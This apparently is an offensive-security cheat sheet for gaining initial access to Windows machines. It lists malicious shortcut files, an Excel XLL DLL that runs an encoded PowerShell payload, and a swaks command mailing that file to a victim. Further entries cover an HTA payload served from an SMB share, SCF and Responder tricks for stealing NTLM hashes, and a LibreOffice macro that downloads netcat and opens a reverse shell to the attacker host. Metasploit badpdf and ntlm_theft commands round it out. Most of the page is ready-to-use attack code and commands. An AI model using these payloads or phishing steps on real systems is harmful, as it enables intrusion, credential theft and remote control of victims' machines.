Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
$obj = New-Object -ComObject WScript.Shell
Sample Output:
TO-DO$link = $obj.CreateShortcut("C:\ProgramData\Calculator.lnk")
Sample Output:
TO-DO$link.TargetPath = "C:\ProgramData\rev.exe"
Sample Output:
TO-DO$link.Save()
Sample Output:
TO-DOshell.c
#include <windows.h>
__declspec(dllexport) void __cdecl xlAutoOpen(void);
void __cdecl xlAutoOpen() {
// Triggers when Excel opens
WinExec("<POWERSHELL_3_BASE64>", 1); // Replace your payload
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
Sample Output:
TO-DO1. Compile shell.c in Linux
x86_64-w64-mingw32-gcc -fPIC -shared -o shell.xll shell.c -luser32
Sample Output:
TO-DO2. Send email with the malicious xll file
swaks --to '<VICTIM>@<DOMAIN>' --from 'attacker@<DOMAIN>' --server '<DOMAIN>' --header 'This is not a malicious file' --body 'This is not a malicious file' --attach '@shell.xll'
Sample Output:
TO-DORef: revshells.com
1. Start a Local SMB Server
# In our local Linux machine
impacket-smbserver -smb2support share .
Sample Output:
TO-DO2. Create a Malicious hta File in local Linux SMB share
<html>
<head>
<HTA:APPLICATION ID="shell">
<script language="javascript">
var c = "<POWERSHELL_3_BASE64>";
new ActiveXObject('WScript.Shell').Run(c, 0, true);
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>
Sample Output:
TO-DO3. Create a shortcut file in target Windows
# In target Windows machine (powershell)
$url = "file://<LOCAL_IP>/share/shell.hta"
Sample Output:
TO-DO$shortcutPath = "C:\ProgramData\shell.url"
Sample Output:
TO-DO$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Sample Output:
TO-DOSet-Content -Path $shortcutPath -Value $shortcutContent
Sample Output:
TO-DORef: revshells.com
If any interaction from target to smb share
1. Start Responder
# In our local Linux machine
sudo responder -I tun0
Sample Output:
TO-DO2. Create a malicious shortcut
[Shell]
Command=2
IconFile=\\<LOCAL_IP>\icon
Sample Output:
TO-DO3. Upload the malicious shortcut
# In our local Linux machine
smbclient -N \\\\<TARGET>\\share\\
Sample Output:
TO-DOmput evil.scf
Sample Output:
TO-DO+--------------------------------------------------------+
| 1. "Tools" > "Macros" > "Organize Macros" > "Basic..." |
| 2. "Untitled 1" > "Standard" > "New" |
| 3. "Paste the code below" |
+--------------------------------------------------------+
Sample Output:
TO-DOSub OnLoad
shell("cmd /c certutil -urlcache -split -f http://<LOCAL_IP>/nc64.exe C:\programdata\nc64.exe && C:\programdata\nc64.exe -e cmd <LOCAL_IP> <LOCAL_PORT>")
End Sub
Sample Output:
TO-DO+-----------------------------------------------------------+
| 4. "Tools" > "Organize Macros" > "Basic..." > "Assign..." |
| 5. "Events" > "Open Document" > "OK" |
| 6. "SAVE" |
+-----------------------------------------------------------+
Sample Output:
TO-DOmsfconsole -q
Sample Output:
TO-DOsearch badpdf
Sample Output:
TO-DOset filename evil.pdf
Sample Output:
TO-DOset lhost <LOCAL_IP>
Sample Output:
TO-DOexploit
Sample Output:
TO-DOpython3 ntlm_theft.py -g all -s <LOCAL_IP> -f test
Sample Output:
TO-DORef: ntlm_theft